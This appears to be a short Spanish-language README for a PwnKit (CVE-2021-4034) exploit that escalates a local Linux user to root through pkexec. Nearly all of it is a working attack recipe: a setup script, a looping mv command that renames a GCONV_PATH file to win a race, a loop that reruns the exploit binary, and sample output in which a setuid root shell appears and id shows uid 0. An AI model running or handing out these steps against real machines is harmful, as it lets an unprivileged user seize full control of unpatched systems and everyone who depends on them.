
Exploit para CVE-2021-4034 (PwnKit) que aprovecha una condición de carrera en pkexec para escalar privilegios a root en sistemas Linux.
Exploit para la vulnerabilidad pwnkit del equipo de Qualys.
Este exploit asume que gcc está presente en la máquina objetivo.
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh
Ejecuta el siguiente comando en una sesión de bash:
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done
Ejecuta el siguiente comando en otra sesión de bash:
while :; do ./exploit; done
Eventualmente ganarás la carrera y obtendrás un binario shell que te dará
acceso root:
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
Un breve análisis de la técnica se puede encontrar en mi blog.